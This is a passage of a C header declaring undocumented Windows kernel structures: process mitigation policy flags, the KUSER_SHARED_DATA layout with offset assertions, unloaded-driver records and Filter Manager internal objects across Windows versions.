union {\n        DWORD Flags;\n        struct {\n            DWORD DisableNonSystemFonts : 1;\n            DWORD AuditNonSystemFontLoading : 1;\n            DWORD ReservedFlags : 30;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_FONT_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_FONT_DISABLE_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10 {\n    union {\n        DWORD Flags;\n        struct {\n            DWORD NoRemoteImages : 1;\n            DWORD NoLowMandatoryLabelImages : 1;\n            DWORD PreferSystem32Images : 1;\n            DWORD AuditNoRemoteImages : 1;\n            DWORD AuditNoLowMandatoryLabelImages : 1;\n            DWORD ReservedFlags : 27;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10, *PPROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10 {\n    union {\n        ULONG Flags;\n        struct {\n            ULONG FilterId : 4;\n            ULONG ReservedFlags : 28;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10 {\n    union {\n        ULONG Flags;\n        struct {\n            ULONG EnableExportAddressFilter : 1;\n            ULONG AuditExportAddressFilter : 1;\n            ULONG EnableExportAddressFilterPlus : 1;\n            ULONG AuditExportAddressFilterPlus : 1;\n            ULONG EnableImportAddressFilter : 1;\n            ULONG AuditImportAddressFilter : 1;\n            ULONG EnableRopStackPivot : 1;\n            ULONG AuditRopStackPivot : 1;\n            ULONG EnableRopCallerCheck : 1;\n            ULONG AuditRopCallerCheck : 1;\n            ULONG EnableRopSimExec : 1;\n            ULONG AuditRopSimExec : 1;\n            ULONG ReservedFlags : 20;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} 
PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10, *PPROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 {\n    union {\n        ULONG Flags;\n        struct {\n            ULONG NoChildProcessCreation : 1;\n            ULONG AuditNoChildProcessCreation : 1;\n            ULONG AllowSecureProcessCreation : 1;\n            ULONG ReservedFlags : 29;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10, *PPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 {\n    union {\n        DWORD Flags;\n        struct {\n            DWORD SmtBranchTargetIsolation : 1;\n            DWORD IsolateSecurityDomain : 1;\n            DWORD DisablePageCombine : 1;\n            DWORD SpeculativeStoreBypassDisable : 1;\n            DWORD ReservedFlags : 28;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10, *PPROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 {\n    union {\n        DWORD Flags;\n        struct {\n            DWORD DisallowWin32kSystemCalls : 1;\n            DWORD AuditDisallowWin32kSystemCalls : 1;\n            DWORD DisallowFsctlSystemCalls : 1;\n            DWORD AuditDisallowFsctlSystemCalls : 1;\n            DWORD ReservedFlags : 28;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 {\n    union {\n        DWORD Flags;\n        struct {\n            DWORD EnableUserShadowStack : 1;\n            DWORD AuditUserShadowStack : 1;\n            DWORD SetContextIpValidation : 1;\n            DWORD AuditSetContextIpValidation : 1;\n            DWORD EnableUserShadowStackStrictMode : 1;\n            
DWORD BlockNonCetBinaries : 1;\n            DWORD BlockNonCetBinariesNonEhcont : 1;\n            DWORD AuditBlockNonCetBinaries : 1;\n            DWORD CetDynamicApisOutOfProcOnly : 1;\n            DWORD ReservedFlags : 23;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10, * PPROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10 {\n    union {\n        DWORD Flags;\n        struct {\n            DWORD EnforceRedirectionTrust : 1;\n            DWORD AuditRedirectionTrust : 1;\n            DWORD ReservedFlags : 30;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10, * PPROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10;\n\ntypedef struct _PROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11 {\n    union {\n        ULONG Flags;\n        struct {\n            ULONG EnablePointerAuthUserIp : 1;\n            ULONG ReservedFlags : 31;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11, * PPROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11;\n\ntypedef struct _PROCESS_MITIGATION_SEHOP_POLICY_W11 {\n    union {\n        ULONG Flags;\n        struct {\n            ULONG EnableSehop : 1;\n            ULONG ReservedFlags : 31;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_SEHOP_POLICY_W11, * PPROCESS_MITIGATION_SEHOP_POLICY_W11;\n\ntypedef struct _PROCESS_MITIGATION_POLICY_INFORMATION {\n    PROCESS_MITIGATION_POLICY Policy;\n    union\n    {\n        PROCESS_MITIGATION_ASLR_POLICY ASLRPolicy;\n        PROCESS_MITIGATION_STRICT_HANDLE_CHECK_POLICY StrictHandleCheckPolicy;\n        PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 SystemCallDisablePolicy;\n        PROCESS_MITIGATION_EXTENSION_POINT_DISABLE_POLICY ExtensionPointDisablePolicy;\n        PROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10 DynamicCodePolicy;\n        
PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10 ControlFlowGuardPolicy;\n        PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10 SignaturePolicy;\n        PROCESS_MITIGATION_FONT_DISABLE_POLICY_W10 FontDisablePolicy;\n        PROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10 ImageLoadPolicy;\n        PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10 SystemCallFilterPolicy;\n        PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10 PayloadRestrictionPolicy;\n        PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 ChildProcessPolicy;\n        PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 SideChannelIsolationPolicy;\n        PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 UserShadowStackPolicy;\n        PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10 RedirectionTrustPolicy;\n        PROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11 UserPointerAuthPolicy;\n        PROCESS_MITIGATION_SEHOP_POLICY_W11 SEHOPPolicy;\n    };\n} PROCESS_MITIGATION_POLICY_INFORMATION, *PPROCESS_MITIGATION_POLICY_INFORMATION;\n\n/*\n**  MITIGATION POLICY END\n*/\n\n/*\n** KUSER_SHARED_DATA START\n*/\n#define NX_SUPPORT_POLICY_ALWAYSOFF     0\n#define NX_SUPPORT_POLICY_ALWAYSON      1\n#define NX_SUPPORT_POLICY_OPTIN         2\n#define NX_SUPPORT_POLICY_OPTOUT        3\n\n#define SEH_VALIDATION_POLICY_ON        0\n#define SEH_VALIDATION_POLICY_OFF       1\n#define SEH_VALIDATION_POLICY_TELEMETRY 2\n#define SEH_VALIDATION_POLICY_DEFER     3\n\n#include <pshpack4.h>\ntypedef struct _KSYSTEM_TIME {\n    ULONG LowPart;\n    LONG High1Time;\n    LONG High2Time;\n} KSYSTEM_TIME, *PKSYSTEM_TIME;\n#include <poppack.h>\n\ntypedef enum _NT_PRODUCT_TYPE {\n    NtProductWinNt = 1,\n    NtProductLanManNt,\n    NtProductServer\n} NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE;\n\n#define PROCESSOR_FEATURE_MAX 64\n\ntypedef enum _ALTERNATIVE_ARCHITECTURE_TYPE {\n    StandardDesign,                 // None == 0 == standard design\n    NEC98x86,                       // NEC PC98xx series on X86\n    EndAlternatives                 
// past end of known alternatives\n} ALTERNATIVE_ARCHITECTURE_TYPE;\n\n//\n// Define Address of User Shared Data\n//\n#define MM_SHARED_USER_DATA_VA      0x000000007FFE0000\n\n//\n// WARNING: this definition is OS version dependent.\n// Structure may be incomplete.\n//\n#include <pshpack4.h>\ntypedef struct _KUSER_SHARED_DATA {\n\n    ULONG TickCountLowDeprecated;\n    ULONG TickCountMultiplier;\n\n    volatile KSYSTEM_TIME InterruptTime;\n    volatile KSYSTEM_TIME SystemTime;\n    volatile KSYSTEM_TIME TimeZoneBias;\n\n    USHORT ImageNumberLow;\n    USHORT ImageNumberHigh;\n\n    WCHAR NtSystemRoot[260];\n\n    ULONG MaxStackTraceDepth;\n    ULONG CryptoExponent;\n    ULONG TimeZoneId;\n    ULONG LargePageMinimum;\n\n    union {\n        ULONG Reserved2[7];\n        struct {\n            ULONG AitSamplingValue;\n            ULONG AppCompatFlag;\n            struct {\n                ULONG LowPart;\n                ULONG HighPart;\n            } RNGSeedVersion;\n            ULONG GlobalValidationRunlevel;\n            LONG TimeZoneBiasStamp;\n            ULONG NtBuildNumber;\n        };\n    };\n\n    NT_PRODUCT_TYPE NtProductType;\n    BOOLEAN ProductTypeIsValid;\n    UCHAR Reserved0[1];\n    USHORT NativeProcessorArchitecture;\n\n    ULONG NtMajorVersion;\n    ULONG NtMinorVersion;\n\n    BOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX];\n    ULONG Reserved1;\n    ULONG Reserved3;\n    volatile ULONG TimeSlip;\n    ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;\n    ULONG BootId; //previously AltArchitecturePad\n    LARGE_INTEGER SystemExpirationDate;\n    ULONG SuiteMask;\n    BOOLEAN KdDebuggerEnabled;\n\n    union {\n        UCHAR MitigationPolicies;\n        struct {\n            UCHAR NXSupportPolicy : 2;\n            UCHAR SEHValidationPolicy : 2;\n            UCHAR CurDirDevicesSkippedForDlls : 2;\n            UCHAR Reserved : 2;\n        };\n    };\n\n    UCHAR Reserved6[2];\n\n    volatile ULONG ActiveConsoleId;\n    volatile ULONG 
DismountCount;\n    ULONG ComPlusPackage;\n    ULONG LastSystemRITEventTickCount;\n    ULONG NumberOfPhysicalPages;\n    BOOLEAN SafeBootMode;\n    UCHAR VirtualizationFlags;\n    UCHAR Reserved12[2];\n\n    union {\n        ULONG SharedDataFlags;\n        struct {\n            ULONG DbgErrorPortPresent : 1;\n            ULONG DbgElevationEnabled : 1;\n            ULONG DbgVirtEnabled : 1;\n            ULONG DbgInstallerDetectEnabled : 1;\n            ULONG DbgLkgEnabled : 1;\n            ULONG DbgDynProcessorEnabled : 1;\n            ULONG DbgConsoleBrokerEnabled : 1;\n            ULONG DbgSecureBootEnabled : 1;\n            ULONG DbgMultiSessionSku : 1;\n            ULONG DbgMultiUsersInSessionSku : 1;\n            ULONG DbgStateSeparationEnabled : 1;\n            ULONG DbgSplitTokenEnabled : 1;\n            ULONG DbgShadowAdminEnabled : 1;\n            ULONG SpareBits : 19;\n        };\n    };\n    ULONG DataFlagsPad[1];\n    ULONGLONG TestRetInstruction;\n    LONGLONG QpcFrequency;\n\n    ULONG SystemCall;\n    ULONG SystemCallPad0;\n\n    ULONGLONG SystemCallPad[2];\n\n    union {\n        volatile KSYSTEM_TIME TickCount;\n        volatile ULONG64 TickCountQuad;\n        struct {\n            ULONG ReservedTickCountOverlay[3];\n            ULONG TickCountPad[1];\n        };\n    };\n\n    ULONG Cookie;\n    ULONG CookiedPad[1];\n\n    LONGLONG ConsoleSessionForegroundProcessId;\n\n    ULONGLONG TimeUpdateLock;\n    ULONGLONG BaselineSystemTimeQpc;\n    ULONGLONG BaselineInterruptTimeQpc;\n    ULONGLONG QpcSystemTimeIncrement;\n    ULONGLONG QpcInterruptTimeIncrement;\n    UCHAR QpcSystemTimeIncrementShift;\n    UCHAR QpcInterruptTimeIncrementShift;\n    USHORT UnparkedProcessorCount;\n\n    ULONG EnclaveFeatureMask[4];\n    union {\n        ULONG Reserved8;\n        ULONG TelemetryCoverageRound;\n    };\n\n    USHORT UserModeGlobalLogger[16];\n\n    ULONG ImageFileExecutionOptions;\n    ULONG LangGenerationCount;\n    ULONGLONG Reserved4;\n\n    volatile 
ULONG64 InterruptTimeBias;\n    volatile ULONG64 QpcBias;\n\n    ULONG ActiveProcessorCount;\n    volatile UCHAR ActiveGroupCount;\n    UCHAR Reserved9;\n\n    union {\n        USHORT QpcData;\n        struct {\n            UCHAR QpcBypassEnabled : 1;\n            UCHAR QpcShift : 1;\n        };\n    };\n\n    LARGE_INTEGER TimeZoneBiasEffectiveStart;\n    LARGE_INTEGER TimeZoneBiasEffectiveEnd;\n\n    XSTATE_CONFIGURATION XState;\n\n    KSYSTEM_TIME FeatureConfigurationChangeStamp;\n    ULONG Spare;\n\n    ULONG64 UserPointerAuthMask;\n\n    ULONG InternsReserved[210];\n\n} KUSER_SHARED_DATA, *PKUSER_SHARED_DATA;\n#include <poppack.h>\n\n#define USER_SHARED_DATA ((KUSER_SHARED_DATA * const)MM_SHARED_USER_DATA_VA)\n\n#if !defined(__midl) && !defined(MIDL_PASS)\n\n//\n// The overall size can change, but it must be the same for all architectures.\n//\n\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountLowDeprecated) == 0x0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountMultiplier) == 0x4);\nC_ASSERT(__alignof(KSYSTEM_TIME) == 4);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTime) == 0x08);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemTime) == 0x014);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBias) == 0x020);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageNumberLow) == 0x02c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageNumberHigh) == 0x02e);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtSystemRoot) == 0x030);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, MaxStackTraceDepth) == 0x238);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, CryptoExponent) == 0x23c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneId) == 0x240);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LargePageMinimum) == 0x244);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AitSamplingValue) == 0x248);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AppCompatFlag) == 0x24c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, RNGSeedVersion) == 0x250);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, 
GlobalValidationRunlevel) == 0x258);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasStamp) == 0x25c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtBuildNumber) == 0x260);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtProductType) == 0x264);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ProductTypeIsValid) == 0x268);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NativeProcessorArchitecture) == 0x26a);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtMajorVersion) == 0x26c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtMinorVersion) == 0x270);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ProcessorFeatures) == 0x274);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved1) == 0x2b4);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved3) == 0x2b8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeSlip) == 0x2bc);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AlternativeArchitecture) == 0x2c0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemExpirationDate) == 0x2c8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SuiteMask) == 0x2d0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, KdDebuggerEnabled) == 0x2d4);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, MitigationPolicies) == 0x2d5);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveConsoleId) == 0x2d8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, DismountCount) == 0x2dc);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ComPlusPackage) == 0x2e0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LastSystemRITEventTickCount) == 0x2e4);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NumberOfPhysicalPages) == 0x2e8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SafeBootMode) == 0x2ec);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, VirtualizationFlags) == 0x2ed);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved12) == 0x2ee);\n\n#if defined(_MSC_EXTENSIONS)\n\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SharedDataFlags) == 0x2f0);\n\n#endif\n\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TestRetInstruction) == 0x2f8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcFrequency) == 
0x300);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCall) == 0x308);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCallPad0) == 0x30c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCallPad) == 0x310);\n\n#if defined(_MSC_EXTENSIONS)\n\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCount) == 0x320);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountQuad) == 0x320);\n\n#endif\n\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Cookie) == 0x330);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ConsoleSessionForegroundProcessId) == 0x338);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeUpdateLock) == 0x340);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, BaselineSystemTimeQpc) == 0x348);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, BaselineInterruptTimeQpc) == 0x350);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcSystemTimeIncrement) == 0x358);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcInterruptTimeIncrement) == 0x360);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcSystemTimeIncrementShift) == 0x368);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcInterruptTimeIncrementShift) == 0x369);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, UnparkedProcessorCount) == 0x36a);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, EnclaveFeatureMask) == 0x36c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved8) == 0x37c);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, UserModeGlobalLogger) == 0x380);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageFileExecutionOptions) == 0x3a0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LangGenerationCount) == 0x3a4);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved4) == 0x3a8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTimeBias) == 0x3b0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcBias) == 0x3b8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveProcessorCount) == 0x3c0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveGroupCount) == 0x3c4);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved9) == 0x3c5);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcData) == 
0x3c6);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasEffectiveStart) == 0x3c8);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasEffectiveEnd) == 0x3d0);\nC_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, XState) == 0x3d8);\n\n#endif /* __midl | MIDL_PASS */\n\n/*\n** KUSER_SHARED_DATA END\n*/\n\n/*\n** MM UNLOADED DRIVERS START\n*/\n\ntypedef struct _UNLOADED_DRIVERS {\n    UNICODE_STRING Name;\n    PVOID StartAddress;\n    PVOID EndAddress;\n    LARGE_INTEGER CurrentTime;\n} UNLOADED_DRIVERS, *PUNLOADED_DRIVERS;\n\n#define MI_UNLOADED_DRIVERS 50\n\n/*\n** MM UNLOADED DRIVERS END\n*/\n\n\n/*\n** FLT MANAGER START\n*/\ntypedef enum _FLT_FILTER_FLAGS {\n    FLTFL_MANDATORY_UNLOAD_IN_PROGRESS = 1,\n    FLTFL_FILTERING_INITIATED = 2,\n    FLTFL_NAME_PROVIDER = 4,\n    FLTFL_SUPPORTS_PIPES_MAILSLOTS = 8,\n    FLTFL_BACKED_BY_PAGEFILE = 16,\n    FLTFL_SUPPORTS_DAX_VOLUME = 32,\n    FLTFL_SUPPORTS_WCOS = 64,\n    FLTFL_FILTERS_READ_WRITE = 128,\n} FLT_FILTER_FLAGS, *PFLT_FILTER_FLAGS;\n\ntypedef enum _FLT_OBJECT_FLAGS {\n    FLT_OBFL_DRAINING = 1,\n    FLT_OBFL_ZOMBIED = 2,\n    FLT_OBFL_TYPE_INSTANCE = 0x1000000,\n    FLT_OBFL_TYPE_FILTER = 0x2000000,\n    FLT_OBFL_TYPE_VOLUME = 0x4000000,\n} FLT_OBJECT_FLAGS, *PFLT_OBJECT_FLAGS;\n\ntypedef struct _FLT_OBJECT {\n    ULONG Flags;\n    ULONG PointerCount;\n    EX_RUNDOWN_REF RundownRef;\n    LIST_ENTRY PrimaryLink;\n} FLT_OBJECT, *PFLT_OBJECT;\n\n// Since w10 th1\ntypedef struct _FLT_OBJECT_V2 {\n    ULONG Flags;\n    ULONG PointerCount;\n    EX_RUNDOWN_REF RundownRef;\n    LIST_ENTRY PrimaryLink;\n    GUID UniqueIdentifier;\n} FLT_OBJECT_V2, *PFLT_OBJECT_V2; /* size: 0x0030 */\n\n// Since w11 25h2\ntypedef struct _FLT_OBJECT_V3 {\n    ULONG Flags;\n    ULONG PointerCount;\n    EX_RUNDOWN_REF RundownRef;\n    LIST_ENTRY PrimaryLink;\n    PVOID RundownLog;\n    GUID UniqueIdentifier;\n} FLT_OBJECT_V3, * PFLT_OBJECT_V3; /* size: 0x0038 */\n\ntypedef struct _FLT_OBJECT_LOG_ENTRY {\n    ULONG Action;\n    LONG 
Padding_25;\n    EX_RUNDOWN_REF RundownRef;\n    PVOID Stack[14];\n} FLT_OBJECT_LOG_ENTRY, * PFLT_OBJECT_LOG_ENTRY; /* size: 0x0080 */\n\ntypedef struct _FLT_OBJECT_LOG {\n    LONG Index;\n    ULONG Reserved;\n    FLT_OBJECT_LOG_ENTRY Log[1024];\n} FLT_OBJECT_LOG, * PFLT_OBJECT_LOG; /* size: 0x20008 */\n\ntypedef struct _FLT_SERVER_PORT_OBJECT {\n    LIST_ENTRY FilterLink;\n    PVOID ConnectNotify;\n    PVOID DisconnectNotify;\n    PVOID MessageNotify;\n    PVOID Filter;\n    PVOID Cookie;\n    ULONG Flags;\n    LONG NumberOfConnections;\n    LONG MaxConnections;\n    LONG __PADDING__[1];\n} FLT_SERVER_PORT_OBJECT, *PFLT_SERVER_PORT_OBJECT; /* size: 0x0048 */\n\ntypedef struct _FLT_RESOURCE_LIST_HEAD {\n    ERESOURCE rLock;\n    LIST_ENTRY rList;\n    ULONG rCount;\n    LONG __PADDING__[1];\n} FLT_RESOURCE_LIST_HEAD, *PFLT_RESOURCE_LIST_HEAD; /* size: 0x0080 */\n\ntypedef struct _FLT_MUTEX_LIST_HEAD {\n    FAST_MUTEX mLock;\n    LIST_ENTRY mList;\n    union {\n        ULONG mCount;\n        struct {\n            UCHAR mInvalid : 1;\n            CHAR __PADDING__[7];\n        };\n    }; \n} FLT_MUTEX_LIST_HEAD, *PFLT_MUTEX_LIST_HEAD; /* size: 0x0050 */\n\n// Windows 7 version\ntypedef struct _FLT_FILTER_V1 {\n    /* 0x0000 */ FLT_OBJECT Base;\n    /* 0x0020 */ struct _FLTP_FRAME* Frame;\n    /* 0x0028 */ UNICODE_STRING Name;\n    /* 0x0038 */ UNICODE_STRING DefaultAltitude;\n    /* 0x0048 */ FLT_FILTER_FLAGS Flags;\n    /* 0x004c */ LONG Padding;\n    /* 0x0050 */ DRIVER_OBJECT* DriverObject;\n    /* 0x0058 */ FLT_RESOURCE_LIST_HEAD InstanceList;\n    /* 0x00d8 */ struct FLT_VERIFIER_EXTENSION* VerifierExtension;\n    /* 0x00e0 */ LIST_ENTRY VerifiedFiltersLink;\n    /* 0x00f0 */ PVOID FilterUnload /* function */;\n    /* 0x00f8 */ PVOID InstanceSetup /* function */;\n    /* 0x0100 */ PVOID InstanceQueryTeardown /* function */;\n    /* 0x0108 */ PVOID InstanceTeardownStart /* function */;\n    /* 0x0110 */ PVOID InstanceTeardownComplete /* function */;\n    /* 0x0118 
*/ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;\n    /* 0x0120 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[6];\n    /* 0x0150 */ PVOID PreVolumeMount /* function */;\n    /* 0x0158 */ PVOID PostVolumeMount /* function */;\n    /* 0x0160 */ PVOID GenerateFileName /* function */;\n    /* 0x0168 */ PVOID NormalizeNameComponent /* function */;\n    /* 0x0170 */ PVOID NormalizeNameComponentEx /* function */;\n    /* 0x0178 */ PVOID NormalizeContextCleanup /* function */;\n    /* 0x0180 */ PVOID KtmNotification /* function */;\n    /* 0x0188 */ struct _FLT_OPERATION_REGISTRATION* Operations;\n    /* 0x0190 */ PVOID OldDriverUnload /* function */;\n    /* 0x0198 */ FLT_MUTEX_LIST_HEAD ActiveOpens;\n    /* 0x01e8 */ FLT_MUTEX_LIST_HEAD ConnectionList;\n    /* 0x0238 */ FLT_MUTEX_LIST_HEAD PortList;\n    /* 0x0288 */ EX_PUSH_LOCK PortLock;\n} FLT_FILTER_V1, * PFLT_FILTER_V1; /* size: 0x0290 */\n\n// Windows 8/8.1 version\ntypedef struct _FLT_FILTER_V2 {\n    /* 0x0000 */ FLT_OBJECT Base;\n    /* 0x0020 */ struct _FLTP_FRAME* Frame;\n    /* 0x0028 */ UNICODE_STRING Name;\n    /* 0x0038 */ UNICODE_STRING DefaultAltitude;\n    /* 0x0048 */ FLT_FILTER_FLAGS Flags;\n    /* 0x004c */ LONG Padding;\n    /* 0x0050 */ DRIVER_OBJECT* DriverObject;\n    /* 0x0058 */ FLT_RESOURCE_LIST_HEAD InstanceList;\n    /* 0x00d8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;\n    /* 0x00e0 */ LIST_ENTRY VerifiedFiltersLink;\n    /* 0x00f0 */ PVOID FilterUnload /* function */;\n    /* 0x00f8 */ PVOID InstanceSetup /* function */;\n    /* 0x0100 */ PVOID InstanceQueryTeardown /* function */;\n    /* 0x0108 */ PVOID InstanceTeardownStart /* function */;\n    /* 0x0110 */ PVOID InstanceTeardownComplete /* function */;\n    /* 0x0118 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;\n    /* 0x0120 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];\n    /* 0x0158 */ PVOID PreVolumeMount /* function */;\n    /* 0x0160 */ PVOID PostVolumeMount /* 
